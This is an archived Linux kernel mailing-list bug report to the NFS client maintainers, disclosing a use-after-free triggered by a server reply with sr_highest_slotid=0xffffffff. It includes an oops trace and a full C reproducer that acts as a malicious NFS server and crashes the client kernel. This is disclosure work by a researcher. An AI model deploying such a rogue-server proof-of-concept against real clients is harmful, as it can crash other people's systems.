From: rtm@csail.mit.edu
To: Trond Myklebust <trond.myklebust@hammerspace.com>,
Anna Schumaker <anna.schumaker@netapp.com>
Cc: linux-nfs@vger.kernel.org
Subject: NFS client can use slot after it is kfree()ed
Date: Sun, 07 Nov 2021 04:57:15 -0500 [thread overview]
Message-ID: <33492.1636279035@crash.local> (raw)
[-- Attachment #1: Type: text/plain, Size: 2509 bytes --]
If the server returns sr_highest_slotid=0xffffffff in an OP_SEQUENCE
reply, nfs41_set_server_slotid_locked() will cause all the slots to be
kfree()ed, including the one that's in use. nfs41_release_slot() will
then dereference pointers extracted from the freed slot, and possibly
crash. 0xffffffff is special because highest_slotid + 1 wraps around to 0
in this code, so the slot table is shrunk to zero slots:
nfs4_shrink_slot_table(tbl, highest_slotid + 1);
I've attached a program that demonstrates the bug. My machine has
slub_debug=FZP.
# uname -a
Linux (none) 5.15.0-rc7-dirty #19 SMP Sat Nov 6 12:55:40 UTC 2021 riscv64 riscv64 riscv64 GNU/Linux
# cc nfs_3.c
# ./a.out
...
[ 18.969075] Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b6b68
[ 18.983273] Oops [#1]
[ 18.988716] Modules linked in:
[ 18.996151] CPU: 0 PID: 60 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #16
[ 19.008294] Hardware name: ucbbar,riscvemu-bare (DT)
[ 19.017541] epc : nfs41_release_slot+0x20/0xc8
[ 19.026918] ra : nfs41_sequence_done+0x22/0x34
[ 19.036245] epc : ffffffff802206ac ra : ffffffff80225a7a sp : ffffffd00057b7f0
...
[ 19.183462] status: 0000000200000121 badaddr: 6b6b6b6b6b6b6b68 cause: 000000000000000d
[ 19.198066] [<ffffffff802206ac>] nfs41_release_slot+0x20/0xc8
[ 19.210683] [<ffffffff80225a7a>] nfs41_sequence_done+0x22/0x34
[ 19.223249] [<ffffffff80226b5e>] nfs41_call_sync_done+0xe/0x16
[ 19.235828] [<ffffffff8071a328>] rpc_exit_task+0x26/0x74
[ 19.246807] [<ffffffff8071a4b0>] __rpc_execute+0x76/0x216
[ 19.257785] [<ffffffff8071aace>] rpc_execute+0x58/0x7e
[ 19.268764] [<ffffffff80713358>] rpc_run_task+0x12c/0x16c
[ 19.279683] [<ffffffff80220a52>] nfs4_call_sync_custom+0x12/0x32
[ 19.292304] [<ffffffff8022388a>] _nfs41_proc_secinfo_no_name.isra.0+0xca/0x13a
[ 19.306944] [<ffffffff8022886c>] nfs41_find_root_sec+0xc6/0x228
[ 19.319538] [<ffffffff8022bf2e>] nfs4_proc_get_rootfh+0x26/0x9a
[ 19.332128] [<ffffffff80248396>] nfs4_get_rootfh+0x40/0xbc
[ 19.343070] [<ffffffff80248a5a>] nfs4_server_common_setup+0x1ac/0x1be
[ 19.356076] [<ffffffff802498e6>] nfs4_create_server+0x16c/0x208
[ 19.368654] [<ffffffff8024161e>] nfs4_try_get_tree+0x16/0x4c
[ 19.381247] [<ffffffff80218bac>] nfs_get_tree+0x34a/0x3ac
[ 19.392176] [<ffffffff8012bce4>] vfs_get_tree+0x18/0x88
[ 19.403092] [<ffffffff8014a28e>] path_mount+0x4f4/0x77a
[ 19.414080] [<ffffffff8014a560>] do_mount+0x4c/0x7e
[ 19.424644] [<ffffffff8014a912>] sys_mount+0xca/0x14e
[ 19.435623] [<ffffffff80003046>] ret_from_syscall+0x0/0x2
[-- Attachment #2: nfs_3.c --]
[-- Type: application/octet-stream, Size: 7157 bytes --]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <assert.h>
// Capacity of the aa[] table below.
#define NAA 64
// Values consumed three at a time by parse_op_sequence() and sent as
// sr_slotid, sr_highest_slotid and sr_target_highest_slotid. With this
// initializer the first SEQUENCE reply carries 0,0,0 and the second one
// carries sr_highest_slotid = 0xffffffff.
unsigned long long aa[NAA] = { 0, 0, 0, 0, 0xffffffff, 0 };
// Index of the next unused entry in aa[].
int aai = 0;
// The request being parsed: main() reads ilen bytes into ibuf, and ii is
// the offset of the next unparsed byte.
char ibuf[4096];
int ilen = 0;
int ii = 0;
// The reply being built; oi is the offset of the next byte to write.
char obuf[4096];
int oi = 0;
// Read exactly n bytes from fd into xbuf, looping over short reads.
// Returns n on success. If read() reports an error or end-of-file before
// n bytes have arrived, calls perror("read") and returns -1.
int readn(int fd, void *xbuf, int n) {
  char *cursor = xbuf;
  int remaining;

  for(remaining = n; remaining > 0; ){
    int got = read(fd, cursor, remaining);
    if(got <= 0){
      perror("read");
      return -1;
    }
    cursor += got;
    remaining -= got;
  }
  return n;
}
// Consume one big-endian 32-bit word from ibuf at offset ii and return it
// in host byte order.
//
// If fewer than four unread bytes remain in the request, prints a
// diagnostic and returns 0 without advancing ii.
unsigned int
parse32()
{
  // Require the whole word to lie inside the request, not just its first
  // byte, so a truncated request cannot make us read past ilen.
  if(ii < 0 || ilen - ii < 4){
    printf("parsed beyond the end of the input\n");
    return 0;
  }
  // Copy instead of casting: ibuf is a char array, so ibuf+ii gives no
  // alignment or aliasing guarantee for a direct integer load.
  unsigned int x = 0;
  memcpy(&x, ibuf + ii, 4);
  ii += 4;
  return ntohl(x);
}
// Consume two consecutive 32-bit words with parse32() and combine them
// into one 64-bit value; the first word parsed becomes the upper half.
unsigned long long
parse64()
{
  unsigned long long value = parse32(); // upper 32 bits come first
  value <<= 32;
  value |= parse32();                   // then the lower 32 bits
  return value;
}
// sessionid4 -- 16 bytes
void
parse_sid(char *sid)
{
for(int i = 0; i < 16; i++){
if(sid)
sid[i] = ibuf[ii];
ii++;
}
}
unsigned int
parse_opaque(char *buf)
{
if(buf)
buf[0] = 0;
int nominal_n = parse32();
if(nominal_n > 4096){
printf("crazy opaque length %d\n", nominal_n);
return 0;
}
int real_n = nominal_n;
while((real_n%4) != 0) real_n += 1;
for(int i = 0; i < real_n; i++){
if(buf)
buf[i] = ibuf[ii];
ii++;
}
if(buf)
buf[nominal_n] = 0;
return nominal_n;
}
// Append x to the reply in obuf as a big-endian 32-bit word and advance
// oi by four. oi must be 4-byte aligned on entry (asserted).
//
// If the word would not fit in obuf, prints a diagnostic and drops it
// rather than writing past the end of the buffer.
void
put32(unsigned int x)
{
  assert((oi % 4) == 0);
  if(oi < 0 || oi > (int)sizeof(obuf) - 4){
    printf("reply too long, dropping word\n");
    return;
  }
  // Copy instead of storing through a cast pointer: obuf is a char array.
  unsigned int wire = htonl(x);
  memcpy(obuf + oi, &wire, 4);
  oi += 4;
}
// Append a 64-bit value to the reply as two put32() words, upper half
// first.
void
put64(unsigned long long x)
{
  unsigned int upper = x >> 32;
  unsigned int lower = x; // truncates to the low 32 bits
  put32(upper);
  put32(lower);
}
void
put_opaque(int n, char *buf)
{
put32(n);
for(int i = 0; i < n; i++)
obuf[oi++] = buf[i];
while((n%4)!=0){
obuf[oi++] = 0;
n++;
}
}
void
put_sid(char *sid)
{
for(int i = 0; i < 16; i++){
obuf[oi++] = (sid ? sid[i] : 0);
}
}
// Handler used by parse_rpc() for RPC procedure 0: there are no arguments
// to parse and nothing is added to the reply.
void
parse_nop()
{
  return;
}
void
parse_op_exchange_id()
{
parse32(); // verifier4, first half
parse32(); // verifier4, second half
parse_opaque(0); // eia_clientowner
int cflags = parse32(); // eia_flags
parse32(); // state_protect4_a.spa_how, assume SP4_NONE
int nimpl = parse32(); // length of client_impl_id
for(int impli = 0; impli < nimpl; impli++){
char junk[512];
parse_opaque(junk); // nii_domain
// printf("nii_domain: %s\n", junk);
parse_opaque(junk); // nii_name
// printf("nii_name: %s\n", junk);
parse64(); // 1/2 of nfstime4
parse32(); // 1/2 of nfstime4
}
// finish EXCHANGE_ID4res
put32(0); // eir_status = NFS4_OK
put64(1); // clientid4
put32(1); // sequenceid4
int sflags = 0x103 | 0x10000; // EXCHGID4_FLAG_USE_NON_PNFS
put32(sflags); // eir_flags
put32(0); // state_protect4_r.spr_how = SP4_NONE
put64(1); // server_owner4.so_minor_id
put32(4); // length of so_major_id<>
put32(0x11223344); // so_major_id<>
put32(4); // length of eir_server_scope
put32(0x11223344);
put32(1); // length of eir_server_impl_id<1>
put32(4); // nfs_impl_id4.nii_domain
put32(0x11223344);
put32(4); // nfs_impl_id4.nii_name
put32(0x11223344);
put64(0); // nii_date 1/2
put32(0); // nii_date 2/2
}
// Consume the arguments of a CREATE_SESSION operation and append a
// successful result that echoes back the client's sequence number and
// both sets of channel attributes unchanged.
void
parse_op_create_session()
{
  int chan_attrs[2][6]; // [0] = fore channel, [1] = back channel

  parse64(); // csa_clientid
  int csa_sequence = parse32(); // csa_sequence
  parse32(); // csa_flags

  // csa_fore_chan_attrs, then csa_back_chan_attrs
  for(int chan = 0; chan < 2; chan++){
    int *row = chan_attrs[chan];
    for(int field = 0; field < 6; field++)
      row[field] = parse32();
    parse_opaque(0); // ca_rdma_ird<1>
  }

  put32(0); // OK

  // csr_sessionid: four words, each set to 1
  int words_left = 4;
  while(words_left-- > 0)
    put32(1);

  put32(csa_sequence); // csr_sequence
  put32(0x3); // csr_flags

  for(int chan = 0; chan < 2; chan++){
    const int *row = chan_attrs[chan];
    for(int field = 0; field < 6; field++)
      put32(row[field]);
    put32(0); // ca_rdma_ird
  }
}
void
parse_op_sequence()
{
char sid[16];
parse_sid(sid); // sa_sessionid
int seq = parse32(); // sa_sequenceid
int slotid = parse32(); // sa_slotid
int hislot = parse32(); // sa_highest_slotid
parse32(); // sa_cachethis
put32(0); // OK
put_sid(sid); // sr_sessionid
put32(seq); // sr_sequenceid
int x1 = aa[aai++];
int x2 = aa[aai++];
int x3 = aa[aai++];
put32(x1); // sr_slotid
put32(x2); // sr_highest_slotid
put32(x3); // sr_target_highest_slotid
put32(0); // sr_status_flags
}
// Consume a COMPOUND request and build the matching COMPOUND result:
// status, the echoed tag, the op count, then one result per operation.
// Only ops 42, 43 and 53 are handled (dispatched to parse_op_exchange_id,
// parse_op_create_session and parse_op_sequence); any other op ends the
// loop because its argument length is unknown.
void parse_compound()
{
  // parse_opaque() accepts lengths up to 4096 and stores a NUL after the
  // data, so the tag buffer must hold 4097 bytes; 512 could overflow.
  char tag[4096 + 4];
  int taglen = parse_opaque(tag); // tag
  parse32(); // minor version
  int nops = parse32();
  printf("%d ops\n", nops);
  // start a COMPOUND4res
  put32(0); // nfsstat4 = NFS4_OK
  put_opaque(taglen, tag);
  put32(nops); // length of resarray<>
  // NOTE(review): the guard compares the reply offset oi with the request
  // length ilen; the parse offset ii may have been intended. Left as-is so
  // the reproducer behaves exactly as reported -- confirm before changing.
  for(int opindex = 0; opindex < nops && oi < ilen; opindex++){
    int op = parse32();
    printf("op %d\n", op);
    put32(op); // resop in nfs_resop4
    if(op == 42){
      parse_op_exchange_id();
    } else if(op == 43){
      parse_op_create_session();
    } else if(op == 53){
      parse_op_sequence();
    } else {
      printf("unknown op %d\n", op);
      // cannot continue to the next op since
      // we don't know how long this one is.
      break;
    }
  }
}
// Consume the RPC call header from the request, append an accepted and
// successful RPC reply header carrying the same xid, then hand the rest of
// the request to the handler for the called procedure (0 or 1).
void
parse_rpc()
{
  // SUN RPC call header
  int call_xid = parse32();
  parse32(); // mtype=CALL
  parse32(); // rpc version
  parse32(); // prog#
  parse32(); // prog vers
  int procedure = parse32();
  parse32(); // cred type
  parse_opaque(0); // cred
  parse32(); // verf type
  parse_opaque(0); // verf

  // reply header
  put32(call_xid);
  put32(1); // REPLY
  put32(0); // MSG_ACCEPTED
  put32(0); // opaque_auth flavor = AUTH_NULL
  put32(0); // opaque_auth length
  put32(0); // SUCCESS

  switch(procedure){
  case 0:
    parse_nop();
    break;
  case 1:
    parse_compound();
    break;
  default:
    printf("unknown rpc proc %d\n", procedure);
    break;
  }
}
// Reproducer driver.
//
// Binds a TCP listener on port 2049 and forks two children: one runs
// mount/ls/echo/umount against 127.0.0.1, the other accepts a single
// connection and answers each RPC record with the reply built by
// parse_rpc(). The parent waits seven seconds and then looks for
// 'unhandled sig' in dmesg.
int
main(){
  // Disable core dumps.
  struct rlimit r;
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);
  int s = socket(AF_INET, SOCK_STREAM, 0);
  if(s < 0){
    perror("socket"); exit(1);
  }
  struct sockaddr_in sin;
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(2049);
  int yes = 1;
  setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes));
  if(bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0){
    perror("bind"); exit(1);
  }
  if(listen(s, 10) < 0){
    perror("listen"); exit(1);
  }
  // Child 1: the client side, driven through the mount command.
  int pid1 = fork();
  if(pid1 == 0){
    close(s);
    if(system("echo -n mount: ; mount 127.0.0.1:/tmp /mnt") == 0){
      system("echo -n ls: ; ls -l /mnt/. /mnt/z");
      system("echo -n echo: ; echo hi > /mnt/x");
      system("echo -n umount: ; umount /mnt");
    }
    exit(0);
  }
  // Child 2: the fake server.
  int pid2 = fork();
  if(pid2 == 0){
    socklen_t sinlen = sizeof(sin);
    printf("calling accept\n");
    int s1 = accept(s, (struct sockaddr *) &sin, &sinlen);
    printf("accept returned %d\n", s1);
    if(s1 < 0) { perror("accept"); exit(1); }
    close(s);
    while(1){
      // Each request is preceded by a 4-byte record mark; the top bit is
      // masked off to obtain the length.
      if(readn(s1, &ilen, 4) < 0) break;
      ilen = ntohl(ilen);
      ilen &= 0x7fffffff;
      // The length comes straight off the wire; refuse anything that
      // would overflow ibuf instead of reading it in.
      if(ilen > (int)sizeof(ibuf)){
        printf("request of %d bytes does not fit in ibuf\n", ilen);
        break;
      }
      if(readn(s1, ibuf, ilen) < 0) break;
      oi = ii = 0;
      memset(obuf, 0, sizeof(obuf));
      put32(0); // place-holder for length
      parse_rpc();
      // Fill in the reply's record mark: length with the top bit set.
      unsigned int mark = htonl((oi - 4) | 0x80000000);
      memcpy(obuf, &mark, 4);
      if(write(s1, obuf, oi)<=0) perror("write");
    }
    exit(1);
  }
  close(s);
  sleep(7);
  if(system("dmesg | grep 'unhandled sig'") == 0){
    printf("unhandled signal\n"); while(1){}
  }
  return 0;
}
reply other threads:[~2021-11-07 9:57 UTC|newest]
Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=33492.1636279035@crash.local \
--to=rtm@csail.mit.edu \
--cc=anna.schumaker@netapp.com \
--cc=linux-nfs@vger.kernel.org \
--cc=trond.myklebust@hammerspace.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox